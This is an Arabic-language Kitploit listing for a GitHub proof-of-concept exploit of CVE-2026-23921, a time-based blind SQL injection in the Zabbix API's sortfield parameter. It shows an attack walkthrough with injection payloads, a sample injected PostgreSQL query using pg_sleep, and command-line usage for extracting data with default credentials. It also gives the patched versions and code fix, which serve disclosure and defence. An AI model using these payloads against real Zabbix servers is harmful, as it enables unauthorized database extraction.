Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23921 — إثبات مفهوم للاستغلال لـ CVE-2026-23921، وهو حقن SQL أعمى قائم على الوقت في Zabbix API عبر المعامل sortfield، مما يتيح استخراج البيانات من خلفيات PostgreSQL وMySQL. | Kitploit
أدوات/GitHubGitHub/qucklecrabik/cve-2026-23921
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقأمن قواعد البيانات
GitHubqucklecrabik/cve-2026-23921

CVE-2026-23921

إثبات مفهوم للاستغلال لـ CVE-2026-23921، وهو حقن SQL أعمى قائم على الوقت في Zabbix API عبر المعامل sortfield، مما يتيح استخراج البيانات من خلفيات PostgreSQL وMySQL.

عرض المستودع
8منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23921 — حقن SQL أعمى قائم على الوقت في Zabbix

الإصدارات المتأثرة: Zabbix < 7.0.22 / < 7.2.15 / < 7.4.6
CVSS: عالي
النوع: حقن SQL أعمى قائم على الوقت عبر معامل sortfield
يتطلب مصادقة: نعم (أي مستخدم API؛ Super Admin يتجنب عمليات الربط الخاصة بالصلاحيات)

الثغرة

تقبل خدمات Zabbix API القديمة (host.get، trigger.get، item.get، إلخ) معاملاً غير معلن groupBy عبر zbx_array_merge(). في CApiService::applyQuerySortOptions()، تستبدل مصفوفة groupBy القائمة البيضاء المُضمّنة المستخدمة للتحقق من . يمرر المهاجم نفس حمولة SQL في كل من و — ينجح التحقق مقابل القائمة التي يتحكم بها المهاجم، وتصل الحمولة إلى دون تهريب.

sortfield
groupBy
sortfield
ORDER BY

مسار الهجوم

  1. يرسل المهاجم groupBy: ["hostid,(SELECT IF(...))--"] و sortfield: "hostid,(SELECT IF(...))--" مع countOutput: true
  2. يحتفظ zbx_array_merge بمفتاح groupBy غير المعلن
  3. يبني applyQuerySortOptions القائمة البيضاء من groupBy → ينجح التحقق
  4. يدمج applyQuerySortField الحمولة في ORDER BY
  5. يبني createSelectQueryFromParts استعلام SQL النهائي دون تهريب

استعلام SQL الناتج (PostgreSQL)

root@kitploit:~
SELECT COUNT(*) AS rowscount
FROM hosts h
WHERE h.flags IN (0,4)
ORDER BY h.hostid,(SELECT CASE WHEN ascii(substring(version() FROM 1 FOR 1))>50
                   THEN pg_sleep(3) ELSE pg_sleep(0) END)--

الاستخدام

root@kitploit:~
# PostgreSQL backend (default)
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db pgsql

# MySQL backend
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --user Admin --password zabbix --db mysql

# Existing auth token
python exploit_CVE-2026-23921.py \
    --url http://TARGET/api_jsonrpc.php \
    --auth <token> --db pgsql

# Extract arbitrary expression
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db pgsql \
    --expr "current_user"

# Use a different API method
python exploit_CVE-2026-23921.py \
    --url ... --auth ... --db mysql \
    --method trigger.get --sort-col triggerid

الإصلاح

قم بالترقية إلى Zabbix 7.0.22 / 7.2.15 / 7.4.6 أو أحدث.

تستبدل الترقية array_merge($options['groupBy'], ...) بـ array_intersect($this->sortColumns, $options['groupBy']) بحيث لا تدخل القيم التي يوفرها المهاجم إلى القائمة البيضاء أبداً. تمت إضافة فحوصات نوع إضافية is_string() و is_array() كدفاع متعدد الطبقات.

إخلاء المسؤولية

هذه الأداة مخصصة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط. استخدمها فقط ضد الأنظمة التي تملكها أو لديك إذن كتابي صريح باختبارها.

تنزيل الأداة